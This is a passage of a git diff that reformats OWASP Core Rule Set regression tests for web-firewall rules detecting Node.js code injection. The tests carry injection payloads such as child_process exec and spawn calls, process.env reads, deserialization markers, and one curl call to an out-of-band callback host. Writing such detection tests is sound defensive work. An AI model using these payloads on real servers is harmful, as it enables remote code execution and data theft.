"/get?code=(sy.(st).em)(%40id)" + version: "HTTP/1.1" + output: + log_contains: id "933211" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index a38f9a38b..691f428d0 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml @@ -1,419 +1,392 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - enabled: true - name: "934100.yaml" description: "Tests for rule 934100" +rule_id: 934100 tests: - - test_title: 934100-1 + - test_id: 1 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=_%24%24ND_FUNC%24%24_" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=_%24%24ND_FUNC%24%24_" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 2 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=__js_function" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=__js_function" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 3 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=eval%28String.fromCharCode" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=eval%28String.fromCharCode" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 4 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=function%28%29+%7B" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=function%28%29+%7B" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 5 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=new+Function+%28" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=new+Function+%28" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 6 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=this.constructor.constructor" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=this.constructor.constructor" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 7 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=module.exports%3D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=module.exports%3D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 8 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 9 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 10 desc: process.env test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process.env" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process.env" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 11 desc: console.info test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info(1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=c%5Cu006fnsole.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=c%5Cu006fnsole.info(1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 13 desc: process.env test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=process["env"]' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=process["env"]' + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 14 desc: console.info test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=console["info"](1)' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=console["info"](1)' + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 15 desc: console.info test (call method) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info.call(this,1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info.call(this,1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 16 desc: '"process" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process." + version: HTTP/1.0 + output: + no_log_contains: id "934100" + - test_id: 17 desc: '"console" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console." - version: HTTP/1.0 - output: - no_log_contains: id "934100" - - test_title: 934100-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console." + version: HTTP/1.0 + output: + no_log_contains: id "934100" + - test_id: 18 desc: ssti test 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 19 desc: ssti test 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 20 desc: ssti test 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5Breq.query.a" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 21 desc: ssti test 4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require%5Breq.query.a" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require%5Breq.query.a" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 22 desc: ssti test 5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process%5BmainModule" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process%5BmainModule" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 23 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /get?foo=require("child_process").exec('whoami') - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /get?foo=require("child_process").exec('whoami') + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 24 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - process.env - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + process.env + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "934100" + - test_id: 25 desc: "5ZLKNU33" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - data: | - console.info(1) - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "934100" - - test_title: 934100-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "934100" + - test_id: 26 desc: "5ZLKNU33" stages: - - stage: - input: + - input: dest_addr: 127.0.0.1 headers: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" @@ -426,89 +399,116 @@ tests: uri: "/post" version: "HTTP/1.1" output: - log_contains: id "934100" - - test_title: 934100-27 + log_contains: id "934100" + - test_id: 25 + desc: "5ZLKNU33" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: /post + output: + log_contains: id "934100" + - test_id: 26 + desc: "5ZLKNU33" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + data: | + console.info(1) + uri: /post + output: + log_contains: id "934100" + - test_id: 27 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$ND_FUNC$$_function()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-28 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$ND_FUNC$$_function()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 28 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-29 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=_$$\u004e\u0044_FUNC$$_\u0066unction()' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 29 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-30 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 30 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-31 + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=XyQkXHUwMDRlXHUwMDQ0X0ZVTkMkJF9cdTAwNjZ1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 31 desc: "Detect example function _$$ND_FUNC$$_ submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' - method: GET - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "934100" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: 'test_cookie=\u0058\u0079QkTkRfRlVOQyQkX2Z1bmN0aW9uKCkK' + method: GET + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "934100" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml index 29cfc424f..f49e6353d 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml @@ -1,172 +1,161 @@ --- meta: author: "rekter0, azurit" - enabled: true - name: "934101.yaml" description: "Tests for rule 934101" +rule_id: 934101 tests: - - test_title: 934101-1 + - test_id: 1 desc: additional node ssti tests 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 2 desc: additional node ssti tests 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27fs%27%29.write%28fd%2C%20str%2C%200%2C%20null%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 3 desc: additional node ssti tests 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 4 desc: require child_process stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=require(\"child_process\").exec('whoami')" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=require(\"child_process\").exec('whoami')" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 5 desc: require child_process spawn stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" - version: HTTP/1.0 - output: - log_contains: id "934101" - - test_title: 934101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/rce/lol%3drequire%3bx%3d\"child_process\"%3blol(x).spawn('curl',+['5gmgdi7mjd5o3g8oj8gawq6n8ee5ht6.oastify.com'])%3b" + version: HTTP/1.0 + output: + log_contains: id "934101" + - test_id: 6 desc: 